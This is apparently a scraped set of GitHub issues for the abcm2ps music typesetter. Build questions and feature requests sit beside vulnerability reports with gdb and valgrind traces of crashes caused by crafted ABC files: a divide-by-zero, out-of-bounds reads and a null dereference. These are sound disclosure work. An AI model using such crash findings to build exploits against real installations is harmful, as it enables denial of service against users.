by 0x110E2C: treat_file (abcm2ps.c:240)
by 0x10F9E0: main (abcm2ps.c:1033)
Segmentation fault
Reproducer file - Reproducer
As suggested in the installation manual I ran ./configure && make but the following error occured:
gcc -g -O2 -Wall -pipe -DHAVE_PANGO=1 -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/lib/libffi-3.2.1/include -I/usr/include/harfbuzz -I/usr/include/fribidi -I/usr/include/freetype2 -I/usr/include/libpng16 -I/usr/include/uuid -I/usr/include/cairo -I/usr/include/pixman-1 -I. -c -o subs.o subs.c
subs.c: In function ‘pg_line_output’:
subs.c:409:3: error: unknown type name ‘FT_Face’
409 | FT_Face face = pango_fc_font_lock_face(fc_font);
| ^~~~~~~Since the test seem to run, I think this could be some platform specific issue.
Are there any dependencies which could be unmet?
Any help is appreciated! 😊
gcc --version -> gcc (GCC) 9.1.0
uname -r -> Linux x 5.2.6-1-ARCH
When I tried to install abcm2ps-8.13.11 on my mac using the command
make
the following error occured:
gcc -g -O2 -Wall -pipe -DHAVE_PANGO=1 -I. -I/usr/include/pango-1.0 -pthread -I/usr/include/cairo -I/usr/include/glib-2.0 -I/usr/lib/arm-linux-gnueabihf/glib-2.0/include -I/usr/include/pixman-1 -I/usr/include/libpng12 -I/usr/include/freetype2 -c -o subs.o subs.c
subs.c:22:10: fatal error: 'pango/pangocairo.h' file not found
#include <pango/pangocairo.h>
^
1 error generated.
make: *** [subs.o] Error 1
I have already installed pango on my mac(OS Sierra 10.12) and I am sure the folders are under the /usr/include directory.
Could anyone who has ever compiled the sources successfully give me a solution?
'E' key Notes key is equal,voice is not equal,but abcm2ps is voice this parse this notes voice is equal error.
X:1
Z:?
%%scale 0.85
%%pagewidth 21.00cm
%%leftmargin 1.89cm
%%rightmargin 1.26cm
%%score { 1 | ( 2 3 ) }
L:1/16
Q:1/4=120
M:4/4
I:linebreak $
K:C
V:1 treble nm="Piano" snm="Pno."
V:2 treble
V:3 treble
L:1/8
V:1
!wedge!B2!wedge!B2 z2{/a} (g^f/g/) !wedge!c2{/a}(gf/g/) !wedge!d2{/a}(gf/g/) | %1
!wedge!e2{/a}(g^f/g/) !wedge!B2{/a}(gf/g/) !wedge!c2{/a}(gf/g/) !wedge!d2{/a}(gf/g/) |] %2
V:2
FGFG FGFG EGEG DGDG | EGEG FGFG"^cresc." EGEG DGDG |] %2
V:3
[CD][CD] [CD][CD] CC B,B, | CC DD EE B,B, |] %2
https://drive.google.com/open?id=1DvBEh5D-eW4UkvX3947UQh62i7hUIFN1
(gdb) set args POC
(gdb) r
abcm2ps-8.13.20 (2018-02-21)
File POC
POC:3:2: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
^
POC:3:3: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
.
.
.
POC:3:15: error: Wrong duration in voice overlay
POC:4:0: error: Bad character 'k'
POC:4:0: error: Note too much dotted
POC:5:0: error: Bad character 'N'
POC:5:0: error: Bad character 'N'
POC:6:1: error: Wrong duration in voice overlay
POC:6:3: error: No note in voice overlay
POC:6:3: error: Bad character 'K'
POC:6:3: error: Bad character 't'
POC:6:3: error: Wrong duration in voice overlay
POC:6:6: error: !slide! must be on a note or a rest
POC:6:27: warning: Line underfull (256pt of 682pt)
Program received signal SIGSEGV, Segmentation fault.
GI_getenv (name=0x7ffff6a14b8e "BC_FATAL_STDERR", name@entry=0x7ffff6a14b8c "LIBC_FATAL_STDERR")
at getenv.c:84
84 getenv.c: No such file or directory.
(gdb) bt
#0 0x00007ffff68c081d in GI_getenv (name=0x7ffff6a14b8e "BC_FATAL_STDERR",
name@entry=0x7ffff6a14b8c "LIBC_FATAL_STDERR") at getenv.c:84
#1 0x00007ffff68c0f02 in _GI___libc_secure_getenv (name=name@entry=0x7ffff6a14b8c "LIBC_FATAL_STDERR")
at secure-getenv.c:29
#2 0x00007ffff68fe55a in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff6a1649f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:80
#3 0x00007ffff69a015c in __GI___fortify_fail (msg=,
msg@entry=0x7ffff6a16481 "stack smashing detected") at fortify_fail.c:37
#4 0x00007ffff69a0100 in __stack_chk_fail () at stack_chk_fail.c:28
#5 0x0000000000507f45 in delayed_output (indent=) at music.c:5085
Hi,
I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))
valgrind ./report3.abc
valgrind: report3.abc: command not found
root@invictus1306-VirtualBox:/home/invictus1306/Documents/todel/abcm2ps# valgrind ./abcm2ps report3.abc
==17541== Memcheck, a memory error detector
==17541== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17541== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17541== Command: ./abcm2ps report3.abc
==17541==
abcm2ps-8.13.21 (2018-05-05)
File report3.abc
==17541==
==17541== Process terminating with default action of signal 8 (SIGFPE)
==17541== Integer divide by zero at address 0x802F91060
==17541== at 0x434A04: set_tuplet (parse.c:6098)
==17541== by 0x434A04: do_tune (parse.c:3608)
==17541== by 0x4088A1: abc_parse (abcparse.c:177)
==17541== by 0x41F686: txt_add_eos (front.c:379)
==17541== by 0x4200E7: frontend (front.c:891)
==17541== by 0x403FAC: treat_file (abcm2ps.c:239)
==17541== by 0x4030E7: main (abcm2ps.c:1040)
==17541==
==17541== HEAP SUMMARY:
==17541== in use at exit: 218,169 bytes in 29 blocks
==17541== total heap usage: 44 allocs, 15 frees, 300,837 bytes allocated
==17541==
==17541== LEAK SUMMARY:
==17541== definitely lost: 0 bytes in 0 blocks
==17541== indirectly lost: 0 bytes in 0 blocks
==17541== possibly lost: 0 bytes in 0 blocks
==17541== still reachable: 218,169 bytes in 29 blocks
==17541== suppressed: 0 bytes in 0 blocks
==17541== Rerun with --leak-check=full to see details of leaked memory
==17541==
==17541== For counts of detected and suppressed errors, rerun with: -v
==17541== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
It is a division-by-zero vulnerability
report3.zip
<do_tune+2482> idiv esi
$rsi : 0x0000000000000000
Following example shows the behaviour for tuplets with accents. When the tuplet number is on the same side as the accent, the tuplet is drawn nearer than the accent which looks odd.
X:1
K:C
[I:tuplets 0 0 0 2](3!>!g!>!a!>!b (3!>!G!>!A!>!B | [I:tuplets 0 0 0 1] (3!>!g!>!a!>!b (3!>!.g!>!.a!>!.b
In the attached abc file the coda sign is not displayed with certain order of %%staves (see inside the abc). It seems to be due to the "@" guitar chord at the same place (in another voice)
It would be useful to me if abcm2ps supported the Larsen articulation symbols, particularly 'cut' and 'strike'. I'd guess they would be noted with !cut! and !strike! in addition to !roll! which already exists.
I know it is common to notate these using grace notes, but in my current project this notation would be ambiguous, as it requires different interpretation from 'classical' grace notes.
Hi,
I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))
valgrind ./abcm2ps ./report1.abc
==17134== Memcheck, a memory error detector
==17134== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17134== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17134== Command: ./abcm2ps ../../abcm2ps/crashes_/report1.abc
==17134==
abcm2ps-8.13.21 (2018-05-05)
File ../../abcm2ps/crashes_/report1.abc
error: Bad page width 0.0
../../abcm2ps/crashes_/report1.abc:56:10: error: Unknown clef
56 [K:G clef=trfble
^
==17134== Invalid read of size 1
==17134== at 0x41BF78: draw_symbols (draw.c:4746)
==17134== by 0x41BF78: draw_all_symb (draw.c:4835)
==17134== by 0x42960F: output_music (music.c:5141)
==17134== by 0x42E1F0: generate (parse.c:1039)
==17134== by 0x42E877: gen_ly (parse.c:1060)
==17134== by 0x43433F: do_tune (parse.c:3621)
==17134== by 0x4088A1: abc_parse (abcparse.c:177)
==17134== by 0x41F686: txt_add_eos (front.c:379)
==17134== by 0x4200E7: frontend (front.c:891)
==17134== by 0x403FAC: treat_file (abcm2ps.c:239)
==17134== by 0x4030E7: main (abcm2ps.c:1040)
==17134== Address 0x10044817c is not stack'd, malloc'd or (recently) free'd
==17134==
==17134==
==17134== Process terminating with default action of signal 11 (SIGSEGV)
==17134== Access not within mapped region at address 0x10044817C
==17134== at 0x41BF78: draw_symbols (draw.c:4746)
==17134== by 0x41BF78: draw_all_symb (draw.c:4835)
==17134== by 0x42960F: output_music (music.c:5141)
==17134== by 0x42E1F0: generate (parse.c:1039)
==17134== by 0x42E877: gen_ly (parse.c:1060)
==17134== by 0x43433F: do_tune (parse.c:3621)
==17134== by 0x4088A1: abc_parse (abcparse.c:177)
==17134== by 0x41F686: txt_add_eos (front.c:379)
==17134== by 0x4200E7: frontend (front.c:891)
==17134== by 0x403FAC: treat_file (abcm2ps.c:239)
==17134== by 0x4030E7: main (abcm2ps.c:1040)
==17134== If you believe this happened as a result of a stack
==17134== overflow in your program's main thread (unlikely but
==17134== possible), you can try to increase the size of the
==17134== main thread stack using the --main-stacksize= flag.
==17134== The main thread stack size used in this run was 8388608.
==17134==
==17134== HEAP SUMMARY:
==17134== in use at exit: 241,110 bytes in 35 blocks
==17134== total heap usage: 61 allocs, 26 frees, 661,858 bytes allocated
==17134==
==17134== LEAK SUMMARY:
==17134== definitely lost: 0 bytes in 0 blocks
==17134== indirectly lost: 0 bytes in 0 blocks
==17134== possibly lost: 0 bytes in 0 blocks
==17134== still reachable: 241,110 bytes in 35 blocks
==17134== suppressed: 0 bytes in 0 blocks
==17134== Rerun with --leak-check=full to see details of leaked memory
==17134==
==17134== For counts of detected and suppressed errors, rerun with: -v
==17134== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
It is a read access violation (draw_symbols (draw.c:4746))
0x41bf78 <draw_all_symb+4648> movsx edx, BYTE PTR [rax+0x44817d]
The value of rax could be controlled by an attacker
$rax : 0x00000000ffffffff
but I did not do a thorough analysis.
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command :
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Vulnerable code :
if (de->start) { /* deco start */
s = de->start->s;
x = s->x;
if (s->abc_type == ABC_T_NOTE
&& s->u.note.dc.n > 1)
x += 10;
Debug:
GDB :
→ 588 s = de->start->s;
589 x = s->x;
590 if (s->abc_type == ABC_T_NOTE
591 && s->u.note.dc.n > 1)
592 x += 10;
593 // } else { /* end without start */
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x5555555675bf → d_trill(de=0x5555557eb610)
[#1] 0x555555569064 → draw_deco_note()
[#2] 0x555555572d43 → draw_sym_near()
[#3] 0x555555583dbd → delayed_output(indent=0)
[#4] 0x555555583dbd → output_music()
[#5] 0x555555589501 → generate()
[#6] 0x555555589a78 → gen_ly(eob=0x0)
[#7] 0x55555558f8f8 → do_tune()
[#8] 0x555555561a52 → abc_parse(p=0x5555557f4a20 "", fname=0x5555557f39f0 "POC", ln=0x16b)
[#9] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x16b)
gef➤ p de->start
$1 = (struct deco_elt *) 0x0
gef➤ p *de
$2 = {
next = 0x5555557eb648,
prev = 0x5555557eb5d8,
s = 0x5555557e8390,
start = 0x0,
t = 0x4,
staff = 0x0,
flags = 0x0,
defl = 0x0,
m = 0xff,
x = 0,
y = 0,
dy = 0,
val = 0
}
gef➤ i r
rax 0x0 0x0
rbx 0x5555557eb610 0x5555557eb610
rcx 0x1f 0x1f
rdx 0x38 0x38
rsi 0x1f 0x1f
rdi 0x5555557eb610 0x5555557eb610
rbp 0x5555557e8390 0x5555557e8390
rsp 0x7fffffffd640 0x7fffffffd640
r8 0x5555557be7e8 0x5555557be7e8
r9 0x5555557eb5d8 0x5555557eb5d8
r10 0x0 0x0
r11 0x5555557e8130 0x5555557e8130
r12 0x5555557b4320 0x5555557b4320
r13 0x0 0x0
Reproducer file - Reproducer
Out-of-bounds read vulnerability is discovered in the abcm2ps (8.14.1-master).
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command -
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Vulnerable code :
if (s->nhd == 0)
stem_err = min_tb[0][(unsigned) s->nflags];
Debug:
GDB :
Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String ]
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------[ registers ]----
$rax : 0x5555557d7740 ? 0x00005555557d79a0 ? 0x00005555557d7bf0 ? 0x00005555557d7e40 ? 0x00005555557d80a0 ? 0x00005555557d8300 ? 0x00005555557d8558 ? 0x00005555557d87b0
$rbx : 0xffffffd0
$rcx : 0x5555557d79a0 ? 0x00005555557d7bf0 ? 0x00005555557d7e40 ? 0x00005555557d80a0 ? 0x00005555557d8300 ? 0x00005555557d8558 ? 0x00005555557d87b0 ? 0x00005555557d8a10
$rdx : 0xffffffd0
$rsp : 0x7fffffffdad0 ? 0x0000004000000018
$rbp : 0x5555557d7740 ? 0x00005555557d79a0 ? 0x00005555557d7bf0 ? 0x00005555557d7e40 ? 0x00005555557d80a0 ? 0x00005555557d8300 ? 0x00005555557d8558 ? 0x00005555557d87b0
$rsi : 0x0
$rdi : 0x0
$rip : 0x55555556b074 ? <calculate_beam+2580> movss xmm4, DWORD PTR [r15+rbx*4]
$r8 : 0x5555557c39a0 ? 0x00005555557d6448 ? 0x00005555557d66a0 ? 0x00005555557d6900 ? 0x00005555557d6b60 ? 0x00005555557d6dc0 ? 0x00005555557d7020 ? 0x00005555557d7280
$r9 : 0x7fffffffdb50 ? 0x0000000000000000
$r10 : 0x0
$r11 : 0x540
$r12 : 0x0
$r13 : 0x1
$r14 : 0x0
$r15 : 0x5555555a31c0 ? <min_tb+0> add BYTE PTR [rax], al
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$es: 0x0000 $gs: 0x0000 $cs: 0x0033 $fs: 0x0000 $ds: 0x0000 $ss: 0x002b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------[ stack ]----
0x00007fffffffdad0¦+0x00: 0x0000004000000018 ? $rsp
0x00007fffffffdad8¦+0x08: 0x0000000000000400
0x00007fffffffdae0¦+0x10: 0x00000040557d66a0 ("f}U@"?)
0x00007fffffffdae8¦+0x18: 0x0000000000000007
0x00007fffffffdaf0¦+0x20: 0x0000000000000410
0x00007fffffffdaf8¦+0x28: 0x00005555557d1208 ? 0x0000000000000000
0x00007fffffffdb00¦+0x30: 0x0000000000000430
0x00007fffffffdb08¦+0x38: 0x0000000000000000
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------[ code:i386:x86-64 ]----
0x55555556b069 <calculate_beam+2569> test dil, dil
0x55555556b06c <calculate_beam+2572> jne 0x55555556b531 <calculate_beam+3793>
0x55555556b072 <calculate_beam+2578> mov ebx, edx
? 0x55555556b074 <calculate_beam+2580> movss xmm4, DWORD PTR [r15+rbx*4]
0x55555556b07a <calculate_beam+2586> cmp BYTE PTR [rax+0x58], 0x0
0x55555556b07e <calculate_beam+2590> jle 0x55555556b558 <calculate_beam+3832>
0x55555556b084 <calculate_beam+2596> movsx edi, BYTE PTR [rax+rdi*1+0x3d]
0x55555556b089 <calculate_beam+2601> cmp dil, 0x1a
0x55555556b08d <calculate_beam+2605> jle 0x55555556b09f <calculate_beam+2623>
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------[ source:draw.c+353 ]----
348 }
349 x = s->voice == voice ? s->xs : s->x;
350 ys = a * x + b - staff_tb[s->staff].y;
351 if (s->voice == voice) {
352 if (s->nhd == 0)
353 stem_err = min_tb[0][(unsigned) s->nflags];
354 else
355 stem_err = min_tb[1][(unsigned) s->nflags];
356 if (s->stem > 0) {
357 if (s->pits[s->nhd] > 26) {
358 stem_err -= 2;
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------[ threads ]----
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------[ trace ]----
[#0] 0x55555556b074 ? Name: calculate_beam(bm=0x7fffffffdb50, s1=0x5555557d7740)
[#1] 0x5555555719b8 ? Name: draw_sym_near()
[#2] 0x555555582f7d ? Name: delayed_output(indent=0)
[#3] 0x555555582f7d ? Name: output_music()
[#4] 0x5555555886c1 ? Name: generate()
[#5] 0x555555588c38 ? Name: gen_ly(eob=0x0)
[#6] 0x55555558eab8 ? Name: do_tune()
[#7] 0x555555560ce2 ? Name: abc_parse(p=0x5555557ddbb0 "", fname=0x5555557f7f10 "POC", ln=0x16b)
[#8] 0x555555578c14 ? Name: txt_add_eos(fname=0x5555557f7f10 "POC", linenum=0x16b)
[#9] 0x5555555790a4 ? Name: frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0x000055555556b074 in calculate_beam (bm=bm@entry=0x7fffffffdb50, s1=s1@entry=0x5555557d7740) at draw.c:353
gef➤ p min_tb
$377 = {{16, 16, 14, 12, 10, 10}, {14, 14, 10, 9, 9, 9}}
gef➤ p min_tb[0][(unsigned) s->nflags]
$379 = 16
gef➤ p s->nflags
$381 = 0x1
gef➤ p/d s->nflags
$392 = -48
gef➤ i r
rax 0x5555557d7740 0x5555557d7740
rbx 0xffffffd0 0xffffffd0
rcx 0x5555557d79a0 0x5555557d79a0
rdx 0xffffffd0 0xffffffd0
rsi 0x0 0x0
rdi 0x0 0x0
rbp 0x5555557d7740 0x5555557d7740
rsp 0x7fffffffdad0 0x7fffffffdad0
r8 0x5555557c39a0 0x5555557c39a0
r9 0x7fffffffdb50 0x7fffffffdb50
r10 0x0 0x0
r11 0x540 0x540
r12 0x0 0x0
r13 0x1 0x1
r14 0x0 0x0
r15 0x5555555a31c0 0x5555555a31c0
rip 0x55555556b074 0x55555556b074 <calculate_beam+2580>
eflags 0x10246 [ PF ZF IF RF]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
Reproducer file - Reproducer
Hello,
Not exactly an issue, but I am trying to compile abcm2ps using Visual Studio 2015 (the free, Community Edition), and I receive hundreds of errors. Have you tried doing that? I don't even know where to start, to fix it.
Thanks,
Claudius
Null Pointer Dereference vulnerability is discovered in the abcm2ps (8.14.1-master). The same can be triggered by sending a crafted abc file to the abcm2ps binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified another impact when a victim opens a specially crafted file.
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command :
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Synopsis :
As per our research we observed that the vulnerability exists in show located in file svg.c. The function user_ps_write gives user defined postscript sequences then invokes the function svg_write, which writes string length to buffer and goes to ps_exec. when a crafted file is passed to binary abcm2ps, in function show which is triggered by ps_exec, at condition if (stack->type == STR) ,we observed that stack is a structure and has the value NULL in it ,which triggered a null pointer dereference vulnerability.
Vulnerable code :
-> if (stack->type == STR) {
s = pop_free_str();
if (!s || s[0] != '(') {
fprintf(stderr, "svg: No string\n");
ps_error = 1;
return;
}
p = s + 1;
}
Debug:
GDB :
0x00000000004dbda8 in show (type=0x73) at svg.c:1697
1697 if (stack->type == STR) {
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax : 0x0
$rbx : 0x7fffffffcd60 → 0x0000000041b58ab3
$rcx : 0x8
$rdx : 0x0
$rsp : 0x7fffffffcd20 → 0x000000000040647f → <main+7204> mov ecx, 0x0
$rbp : 0x7fffffffcde0 → 0x00007fffffffd020 → 0x00007fffffffd280 → 0x00007fffffffd530 → 0x00007fffffffd570 → 0x00007fffffffd860 → 0x00007fffffffd870 → 0x00007fffffffd8b0
$rsi : 0x755900 → 0x000000003f333333 ("333?"?)
$rdi : 0x755888 → 0x0000000000000000
$rip : 0x4dbda8 → <show+425> movzx eax, BYTE PTR [rax+0x8]
$r8 : 0x800e2b18 → 0x0000000000000000
$r9 : 0x800e2b29 → 0x00f9f9f9f9f9f9f9
$r10 : 0x39a
$r11 : 0x7ffff5a5ff90 → 0xfffda370fffda09f
$r12 : 0x7fffffffcdc0 → 0x00007fffffffcff0 → 0x00007fffffffd020 → 0x00007fffffffd280 → 0x00007fffffffd530 → 0x00007fffffffd570 → 0x00007fffffffd860 → 0x00007fffffffd870
$r13 : 0xffffffff9ac → 0x0000000000000000
$r14 : 0x7fffffffcd60 → 0x0000000041b58ab3
$r15 : 0x7fffffffd5d0 → 0x0000000041b58ab3
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$es: 0x0000 $gs: 0x0000 $fs: 0x0000 $ds: 0x0000 $ss: 0x002b $cs: 0x0033
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffcd20│+0x00: 0x000000000040647f → <main+7204> mov ecx, 0x0 ← $rsp
0x00007fffffffcd28│+0x08: 0x00007f73f58eb830
0x00007fffffffcd30│+0x10: 0x0000000000000000
0x00007fffffffcd38│+0x18: 0x00000000f5a5973b → 0x0000000000000000
0x00007fffffffcd40│+0x20: 0x0000000000000000
0x00007fffffffcd48│+0x28: 0x54fc41fbea02f700
0x00007fffffffcd50│+0x30: 0x0000000000000000
0x00007fffffffcd58│+0x38: 0x00007fffffffcff0 → 0x00007fffffffd020 → 0x00007fffffffd280 → 0x00007fffffffd530 → 0x00007fffffffd570 → 0x00007fffffffd860 → 0x00007fffffffd870
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
0x4dbd9e <show+415> je 0x4dbda8 <show+425>
0x4dbda0 <show+417> mov rdi, rcx
0x4dbda3 <show+420> call 0x402e20 <__asan_report_load1@plt>
→ 0x4dbda8 <show+425> movzx eax, BYTE PTR [rax+0x8]
0x4dbdac <show+429> cmp al, 0x1
0x4dbdae <show+431> jne 0x4dbe7a <show+635>
0x4dbdb4 <show+437> call 0x4d7f1b <pop_free_str>
0x4dbdb9 <show+442> mov QWORD PTR [rbp-0x98], rax
0x4dbdc0 <show+449> cmp QWORD PTR [rbp-0x98], 0x0
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:svg.c+1697 ]────
1692 p = tmp;
1693 tmp[0] = '\0';
1694 s = NULL;
1695 break;
1696 default:
// type=0x73
→ 1697 if (stack->type == STR) {
1698 s = pop_free_str();
1699 if (!s || s[0] != '(') {
1700 fprintf(stderr, "svg: No string\n");
1701 ps_error = 1;
1702 return;
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x4dbda8 → Name: show(type=0x73)
[#1] 0x4e13d9 → Name: ps_exec(op=0x6230000014c8 "gcshow")
[#2] 0x4eb574 → Name: svg_write(buf=0x623000000109 "/octava{\t% usage: w x y octava\n\texch -10 add exch 2 copy\n\tM 0 10 RM /Times-Roman 16 selectfont(8)show\n\t/Times-Roman 12 selectfont(va)show\n\tM 0 6 RL currentpoint stroke M\n\t[6] 0 setdash 30 add 0 RL currentpoint stroke M\n\t[] 0 setdash 0 -6 RL stroke}!\n/octavab{\t% usage: w x y octavab\n\texch -14 add exch 2 copy \n\tM 0 2 RM /Times-Roman 16 selectfont(8)show\n\t/Times-Roman 12 selectfont(va basso)show\n\t22 add M 0 -6 RL currentpoint stroke M\n\t[6] 0 setdash 30 add 0 RL stroke\n\t[] 0 setdash}!\n/bigl{\t\t% usage: str x y bigl\n\t/Times-Bold 26 selectfont\n\t4 add M showc\n\t1 SLW 1 -2 RM \n\t0 22 RL -22 0 RL\n\t0 -22 RL 22 0 RL stroke}!\n/biglc{\t\t% usage: str x y biglc\n\t2 copy 5 2 roll /Times-Bold 22 selectfont\n\t6 add M showc\n\t1 SLW 13 add newpath\n\t12 0 360 arc stroke}!\n/ped{\t\t% usage: str x y ped\n\tgsave 4 add exch -10 add exch T 26 dup scale\n\t0.368 0.074 moveto\n\t0.341 0.121 0.335 0.147 0.371 0.203 curveto\n\t0.435 0.289 0.531 0.243 0.488 0.155 curveto\n\t0.472 0.117 0.434 0.096 0.414 0.080 curveto\n\t0.429 0.038 0.494 -0.006 0.541 0.075 curveto\n\t0.559 0.123 0.558 0.224 0.663 0.252 curveto\n\t0.603 0.354 0.449 0.393 0.461 0.405 curveto\n\t0.902 0.262 0.705 -0.124 0.555 0.046 curveto\n\t0.488 -0.032 0.417 0.021 0.389 0.055 curveto\n\t0.303 -0.018 0.303 -0.020 0.248 0.040 curveto\n\t0.218 0.108 0.191 0.062 0.164 0.047 curveto\n\t0.010 -0.056 0.032 0.019 0.124 0.062 curveto\n\t0.229 0.117 0.200 0.091 0.228 0.195 curveto\n\t0.240 0.241 0.149 0.250 0.166 0.311 curveto\n\t0.207 0.493 lineto\n\t-0.041 0.441 0.049 0.261 0.126 0.387 curveto\n\t0.138 0.381 lineto\n\t-0.020 0.119 -0.100 0.472 0.220 0.507 curveto\n\t0.548 0.486 0.399 0.171 0.254 0.374 curveto\n\t0.264 0.384 lineto\n\t0.338 0.259 0.521 0.449 0.228 0.488 curveto\n\t0.198 0.356 lineto\n\t0.181 0.304 0.273 0.294 0.262 0.241 curveto\n\t0.229 0.101 lineto\n\t0.273 0.070 0.282 -0.038 0.368 0.074 curveto\n\t0.391 0.094 moveto\n\t0.456 0.130 0.476 0.171 0.468 0.213 curveto\n\t0.452 0.276 0.333 0.171 0.391 0.094 curveto\n\t0.627 0.019 moveto\n\t0.533 0.041 0.586 0.228 0.678 0.229 curveto\n\t0.729 0.170 0.712 0.025 0.627 0.019 curveto\n\teofill\n\t0.8 0.04 0.04 0 360 newpath arc fill\n\tpop grestore}!\n/pedoff{\t% usage: str x y pedoff\n\tgsave 4 add exch -5 add exch T 26 dup scale\n\t0.219 0.198 moveto\n\t0.231 0.172 0.195 0.138 0.162 0.173 curveto\n\t0.149 0.219 0.206 0.231 0.219 0.198 curveto\n\t0.144 0.242 moveto\n\t0.166 0.223 0.193 0.230 0.181 0.267 curveto\n\t0.178 0.306 0.144 0.302 0.151 0.335 curveto\n\t0.160 0.381 0.225 0.377 0.224 0.330 curveto\n\t0.228 0.302 0.198 0.306 0.197 0.267 curveto\n\t0.194 0.237 0.213 0.222 0.237 0.247 curveto\n\t0.263 0.276 0.234 0.297 0.268 0.322 curveto\n\t0.314 0.347 0.354 0.297 0.316 0.259 curveto\n\t0.296 0.237 0.273 0.266 0.246 0.237 curveto\n\t0.223 0.217 0.232 0.194 0.266 0.197 curveto\n\t0.303 0.202 0.302 0.232 0.332 0.228 curveto\n\t0.381 0.232 0.388 0.156 0.332 0.152 curveto\n\t0.302 0.148 0.302 0.185 0.266 0.183 curveto\n\t0.231 0.186 0.228 0.169 0.245 0.143 curveto\n\t0.273 0.116 0.297 0.141 0.316 0.117 curveto\n\t0.350 0.075 0.303 0.029 0.258 0.062 curveto\n\t0.237 0.082 0.261 0.102 0.233 0.133 curveto\n\t0.212 0.151 0.194 0.147 0.197 0.113 curveto\n\t0.203 0.075 0.232 0.075 0.230 0.043 curveto\n\t0.223 -0.004 0.159 -0.002 0.152 0.042 curveto\n\t0.148 0.075 0.185 0.076 0.183 0.113 curveto\n\t0.183 0.147 0.163 0.150 0.141 0.133 curveto\n\t0.113 0.104 0.140 0.079 0.113 0.059 curveto\n\t0.069 0.037 0.033 0.077 0.063 0.117 curveto\n\t0.082 0.141 0.104 0.117 0.132 0.142 curveto\n\t0.153 0.163 0.144 0.188 0.113 0.182 curveto\n\t0.073 0.182 0.075 0.147 0.046 0.152 curveto\n\t-0.003 0.152 -0.003 0.227 0.048 0.227 curveto\n\t0.075 0.231 0.075 0.198 0.113 0.196 curveto\n\t0.141 0.197 0.147 0.207 0.133 0.237 curveto\n\t0.102 0.264 0.082 0.237 0.062 0.261 curveto\n\t0.028 0.302 0.077 0.347 0.118 0.318 curveto\n\t0.138 0.297 0.116 0.275 0.144 0.242 curveto\n\tfill pop grestore}!\n/glissup{\t% usage: x y glissup\n\tgsave T 5 0 T\n\t25 rotate 10 0 T 0 0 M\n\t0 8 8{\n\t\t2 -1.15 2.30 150 30 arcn 4 0 T\n\t\t2 1.15 2.30 -150 -30 arc 4 0 T pop\n\t}for\n\t1 SLW stroke grestore}!\n/tr3{\t\t% usage: x y tr3 - mordent with 3 peeks\n\tM 2.2 2.2 RL 2.1 -2.9 RL 0.7 0.7 RL\n\t2.2 2.2 RL 2.1 -2.9 RL 0.7 0.7 RL\n\t2.2 2.2 RL 